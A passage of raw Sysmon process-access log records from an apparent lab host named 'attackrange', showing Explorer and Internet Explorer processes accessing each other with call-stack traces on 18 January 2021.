Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64) 10341000x800000000000000013540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\SHELL32.dll+128d10(wow64)|C:\Windows\System32\SHELL32.dll+19251f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d02(wow64)|C:\Windows\System32\SHELL32.dll+19251f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d02(wow64)|C:\Windows\System32\SHELL32.dll+19251f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.038{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.319{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.303{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.303{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.288{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.500{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.480{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.480{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.476{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet 